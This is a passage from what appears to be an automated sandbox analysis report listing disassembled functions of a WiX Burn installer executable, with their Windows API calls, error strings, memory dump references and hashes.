                                                                                                                                                            • Part of subcall function 00471630: RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,000001D0,?,00020019,?,00000000,00000000,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,?,?), ref: 004716DA
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to open uninstall registry key., xrefs: 00471747
                                                                                                                                                          • SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00471713
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\butil.cpp, xrefs: 00471756
                                                                                                                                                          • Failed to enumerate uninstall key for related bundles., xrefs: 004717DA
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Close$Open
                                                                                                                                                          • String ID: Failed to enumerate uninstall key for related bundles.$Failed to open uninstall registry key.$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\butil.cpp
                                                                                                                                                          • API String ID: 2976201327-1811623788
                                                                                                                                                          • Opcode ID: a1e5e801cee9613cc85f7e1ed03349f2f53f111aec68e1e3c65c3e75f1212c67
                                                                                                                                                          • Instruction ID: 174879dacb4f5ce48e7a816411a072e4312afde03739d9a3bc4dd4c7ab27ebb7
                                                                                                                                                          • Opcode Fuzzy Hash: a1e5e801cee9613cc85f7e1ed03349f2f53f111aec68e1e3c65c3e75f1212c67
                                                                                                                                                          • Instruction Fuzzy Hash: A5214B71E00224FADB25669DCC46FDFBAB8DF40744F118067F908B6161E27C4E40D799
                                                                                                                                                          Function 00401C92 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 95COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Failed to get full path for: %ls$Failed to get parent directory for path: %ls$Full path was not rooted: %ls$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\dirutil.cpp
                                                                                                                                                          • API String ID: 0-2874153667
                                                                                                                                                          • Opcode ID: b46f5e48257232513acac22c7227be6d17b64e10d8d063c42a889c6ec4ccfe10
                                                                                                                                                          • Instruction ID: 809451187560bf8e0490e15f478be7f51a9778091751312aef0fd3a41476b0d0
                                                                                                                                                          • Opcode Fuzzy Hash: b46f5e48257232513acac22c7227be6d17b64e10d8d063c42a889c6ec4ccfe10
                                                                                                                                                          • Instruction Fuzzy Hash: 2821A871744208BAEB209AA5CE46FAF7ABD9F40744F50007BF905F61E1E678DE40D668
                                                                                                                                                          Function 0041F9F4 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 93COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF,00000000,?,?,00000000,00000000,0000055C,00000560,000004A0,00000000,00000120), ref: 0041FABA
                                                                                                                                                          • CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF,00000000,?,?,00000000,00000000,0000055C,00000560,000004A0,00000000,00000120), ref: 0041FAE6
                                                                                                                                                          Strings
                                                                                                                                                          • Failed dependents check on bundle., xrefs: 0041FA69
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\dependency.cpp, xrefs: 0041FA1C
                                                                                                                                                          • Failed to detect provider key bundle id., xrefs: 0041FA0A
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CompareString
                                                                                                                                                          • String ID: Failed dependents check on bundle.$Failed to detect provider key bundle id.$d:\a\wix\wix\src\burn\engine\dependency.cpp
                                                                                                                                                          • API String ID: 1825529933-3310408215
                                                                                                                                                          • Opcode ID: e5740c048b6a1461adc061db8391333ed37bd94c48a9026d394b0263fe6ad2e9
                                                                                                                                                          • Instruction ID: 0d96d744af2de9542a9b5d525fd2047731e6b394b5f2d98a884b53e8880dac83
                                                                                                                                                          • Opcode Fuzzy Hash: e5740c048b6a1461adc061db8391333ed37bd94c48a9026d394b0263fe6ad2e9
                                                                                                                                                          • Instruction Fuzzy Hash: 6B31AF32A04215BAEB219B54CC45FDAB664BF04760F600366F9186B2D0D3B8A9D5CBD9
                                                                                                                                                          Function 00465184 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 92COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _memcpy_s
                                                                                                                                                          • String ID: Failed to ensure buffer size.$Failed to get ANSI string size.$Failed to write string to buffer: '%hs', error: %d$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\buffutil.cpp
                                                                                                                                                          • API String ID: 2001391462-267237466
                                                                                                                                                          • Opcode ID: b21fd61335e95e85789d4dd1f762be2529bc0c197e1454bffc15f1ea8b192ffa
                                                                                                                                                          • Instruction ID: f59bc742998e8d32b229e40e410394e9b2c19e6f5283daf5e4822557a660fa2d
                                                                                                                                                          • Opcode Fuzzy Hash: b21fd61335e95e85789d4dd1f762be2529bc0c197e1454bffc15f1ea8b192ffa
                                                                                                                                                          • Instruction Fuzzy Hash: 7A210772B00714BBDB119A45CC85F6F3B6CEF86764F1501ABF914BB281F2389D009AA6
                                                                                                                                                          Function 00466C63 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00466C84
                                                                                                                                                          • GetLastError.KERNEL32 ref: 00466C8E
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLastLookupPrivilegeValue
                                                                                                                                                          • String ID: Failed to get privilege LUID: %ls$Failed to get token privilege information.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\procutil.cpp
                                                                                                                                                          • API String ID: 2626710698-864132060
                                                                                                                                                          • Opcode ID: d9aa73c01fe2d0f2b169b26e9ef2a335459d2d93b786017b5b76a8c0b04486e8
                                                                                                                                                          • Instruction ID: 07320f937179924f8d5654f6ef20a5b4ee6e23cc1efcaddef25a3656187ea6d1
                                                                                                                                                          • Opcode Fuzzy Hash: d9aa73c01fe2d0f2b169b26e9ef2a335459d2d93b786017b5b76a8c0b04486e8
                                                                                                                                                          • Instruction Fuzzy Hash: 55210A72B00218BBDB219F45CC81E9E7BB8DF41754F124057FD04BB280E27C9D00876A
                                                                                                                                                          Function 0043A7A7 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 87COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF,?), ref: 0043A7DA
                                                                                                                                                          Strings
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\relatedbundle.cpp, xrefs: 0043A850, 0043A882
                                                                                                                                                          • Failed to ensure there is space for related bundles., xrefs: 0043A805
                                                                                                                                                          • Failed to initialize package from related bundle id: %ls, xrefs: 0043A83E
                                                                                                                                                          • Failed to detect dependencies for related bundle., xrefs: 0043A870
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CompareString
                                                                                                                                                          • String ID: Failed to detect dependencies for related bundle.$Failed to ensure there is space for related bundles.$Failed to initialize package from related bundle id: %ls$d:\a\wix\wix\src\burn\engine\relatedbundle.cpp
                                                                                                                                                          • API String ID: 1825529933-2130722745
                                                                                                                                                          • Opcode ID: 63feb51c7398c78391ab73a2406486688cc8445016d778b41b54d842fb6dfe56
                                                                                                                                                          • Instruction ID: c24473a3b9e81c254f9c8e9fe76ee4c3dfc4ada51951599e8c1d817cdd45448f
                                                                                                                                                          • Opcode Fuzzy Hash: 63feb51c7398c78391ab73a2406486688cc8445016d778b41b54d842fb6dfe56
                                                                                                                                                          • Instruction Fuzzy Hash: BB212C31A40610BBDF165E58CC46F9A7F64EF08720F104166F914BA1D1E2789821DB96
                                                                                                                                                          Function 0046F43A Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 83registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0046F352: lstrlenW.KERNEL32(89F84589,004221A7,00000000,00000000,?,0046F557,00000000), ref: 0046F378
                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000000,00020019,00000000,00000000,00000000,00000000,?,?,?,0046F68B,00000000,00000000,00000000,00000000), ref: 0046F511
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to open the registry key for the dependency "%ls"., xrefs: 0046F4AB
                                                                                                                                                          • Failed to get the dependency name for the dependency "%ls"., xrefs: 0046F4EC
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\deputil.cpp, xrefs: 0046F4FB
                                                                                                                                                          • Failed to allocate the registry key for dependency "%ls"., xrefs: 0046F45D
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Closelstrlen
                                                                                                                                                          • String ID: Failed to allocate the registry key for dependency "%ls".$Failed to get the dependency name for the dependency "%ls".$Failed to open the registry key for the dependency "%ls".$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\deputil.cpp
                                                                                                                                                          • API String ID: 3903209405-2614948780
                                                                                                                                                          • Opcode ID: 1f5f8754f0fa24b8ab09fa591fd9a7583067d08b5f709ee99bd63fa49b8f8b4a
                                                                                                                                                          • Instruction ID: e57c9ddac17fd68183a3b306cd450fb3dd6391c619f5d9261319f073189a26d3
                                                                                                                                                          • Opcode Fuzzy Hash: 1f5f8754f0fa24b8ab09fa591fd9a7583067d08b5f709ee99bd63fa49b8f8b4a
                                                                                                                                                          • Instruction Fuzzy Hash: A1210532940224F7DF225E94DC0AF9F7A249B10725F114136FD40BA1A1E77C4E54D68B
                                                                                                                                                          Function 004016CA Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 83COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • WaitForMultipleObjects.KERNEL32(?,?,000000FF,00000000,00000000,?,?,00439EE2,00000002,000000FF,00000000,000000FF,?,?,00000000), ref: 004016DE
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MultipleObjectsWait
                                                                                                                                                          • String ID: Abandoned wait for multiple objects, index: %u.$Failed to wait for multiple objects.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\apputil.cpp
                                                                                                                                                          • API String ID: 862713236-3054627793
                                                                                                                                                          • Opcode ID: 71a6d7e5d5d8aafc1a235b46da0f4c8e4f3e189ae5389ccb06775c9b39419504
                                                                                                                                                          • Instruction ID: a29376ea05187ce795c136ec9b0efa3e75c17d228e617ed7087ab3cbc6e2bf03
                                                                                                                                                          • Opcode Fuzzy Hash: 71a6d7e5d5d8aafc1a235b46da0f4c8e4f3e189ae5389ccb06775c9b39419504
                                                                                                                                                          • Instruction Fuzzy Hash: 92212B7AA4132177D72055154C49F9B6A19DB41B61F92407BFE0ABF2F2E67D8C4042EC
                                                                                                                                                          Function 00409A72 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 83COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00001000,?,000000FF,version.dll,000000FF,?,00000000,?,0040AFB0,0040AFB0,?,004098C0,?,?,00000000), ref: 00409AAE
                                                                                                                                                          • GetLastError.KERNEL32(?,004098C0,?,?,00000000,?,00000000,0040AFB0,?,0040CB94,?,?,?,?,?), ref: 00409ADD
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CompareErrorLastString
                                                                                                                                                          • String ID: Failed to compare strings.$d:\a\wix\wix\src\burn\engine\variable.cpp$version.dll
                                                                                                                                                          • API String ID: 1733990998-4134225108
                                                                                                                                                          • Opcode ID: 83ec1fbd8da41ec6c3158b64551ae333fc62a4e7656c843ebba122aa05e5285d
                                                                                                                                                          • Instruction ID: 28ca414a6ea33a8cddb4571491067c2b432cf49378a167bedc0a05dd97f7e598
                                                                                                                                                          • Opcode Fuzzy Hash: 83ec1fbd8da41ec6c3158b64551ae333fc62a4e7656c843ebba122aa05e5285d
                                                                                                                                                          • Instruction Fuzzy Hash: 04212832A00114ABC7118F9CCC84A6AB774FB49770F25433AF915BB3D1D678ED028BA8
                                                                                                                                                          Function 004373B0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 80COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CoInitializeEx.OLE32(00000000,00000000), ref: 004373C6
                                                                                                                                                          • CoUninitialize.OLE32(?,?,?), ref: 00437469
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to initialize COM., xrefs: 004373D2
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\baengine.cpp, xrefs: 004373E4
                                                                                                                                                          • Failed to get message over bootstrapper application pipe, xrefs: 0043743F
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeUninitialize
                                                                                                                                                          • String ID: Failed to get message over bootstrapper application pipe$Failed to initialize COM.$d:\a\wix\wix\src\burn\engine\baengine.cpp
                                                                                                                                                          • API String ID: 3442037557-3548269937
                                                                                                                                                          • Opcode ID: 454d8858ac54f3b5a410254df409316567caf17e66a693e4f9b6dd19e74740da
                                                                                                                                                          • Instruction ID: e8d767d806275b6992c3b1d340d3e85830efd1794313b262deaba0ef2da6ab16
                                                                                                                                                          • Opcode Fuzzy Hash: 454d8858ac54f3b5a410254df409316567caf17e66a693e4f9b6dd19e74740da
                                                                                                                                                          • Instruction Fuzzy Hash: 84213E7290461577DB11D6E4CC81DEFB7EC9B1C744F100137FA40F3140E668EE048AA5
                                                                                                                                                          Function 0040A5D0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 77COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetCurrentProcess.KERNEL32(?), ref: 0040A5E3
                                                                                                                                                            • Part of subcall function 00466F79: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process2,000001D0,00000001,00000120,?,?,?,00471936,00000000), ref: 00466F91
                                                                                                                                                            • Part of subcall function 00466F79: GetProcAddress.KERNEL32(00000000), ref: 00466F98
                                                                                                                                                            • Part of subcall function 00466F79: GetLastError.KERNEL32(?,?,?,00471936,00000000), ref: 00466FC0
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressCurrentErrorHandleLastModuleProcProcess
                                                                                                                                                          • String ID: Failed to get 64-bit folder.$Failed to get shell folder.$Failed to set variant value.$d:\a\wix\wix\src\burn\engine\variable.cpp
                                                                                                                                                          • API String ID: 896058289-3413941621
                                                                                                                                                          • Opcode ID: 8f917638aa28cb1f1d32e4699e94aebe4de276b1bac319f302c25dd8e5bb845b
                                                                                                                                                          • Instruction ID: d7110f652bc2343abcb355148a46efeaa9e42b2c8857fba5bbd4c9a0e54b7691
                                                                                                                                                          • Opcode Fuzzy Hash: 8f917638aa28cb1f1d32e4699e94aebe4de276b1bac319f302c25dd8e5bb845b
                                                                                                                                                          • Instruction Fuzzy Hash: E4110271E803147ADB226A51CC4AF9F7A7CCF60794F55416BF904BA1C1E6B98E1082EE
                                                                                                                                                          Function 0041B4EE Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 76COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 004073CD: GetProcessHeap.KERNEL32(?,?,?,00403A7B,00000000,00000001,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 004073DE
                                                                                                                                                            • Part of subcall function 004073CD: HeapAlloc.KERNEL32(00000000,?,00403A7B,00000000,00000001,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 004073E5
                                                                                                                                                          • CreateWellKnownSid.ADVAPI32(001F01FF,00000000,00000000,?,00000044,00000001,00000000,0041C5A0,?,?,?,0041C296,001F01FF,0041C5BC,00000000,00000000), ref: 0041B544
                                                                                                                                                          • GetLastError.KERNEL32(?,?,0041C296,001F01FF,0041C5BC,00000000,00000000,?,0041C5A0,0000001A,001F01FF,?,00000000,00000000,?), ref: 0041B54E
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$AllocCreateErrorKnownLastProcessWell
                                                                                                                                                          • String ID: Failed to allocate memory for well known SID.$Failed to create well known SID.$d:\a\wix\wix\src\burn\engine\cache.cpp
                                                                                                                                                          • API String ID: 1343019080-1000434226
                                                                                                                                                          • Opcode ID: 3627e87e74679bdbae715f21b8ce528e62286a42d5cc8401fb030f3f8b1a6cfd
                                                                                                                                                          • Instruction ID: 6fd43fa38fa332ee6f9cb697e49224ac34e9cd4d0d6158f40057cfd6ffe5fe9d
                                                                                                                                                          • Opcode Fuzzy Hash: 3627e87e74679bdbae715f21b8ce528e62286a42d5cc8401fb030f3f8b1a6cfd
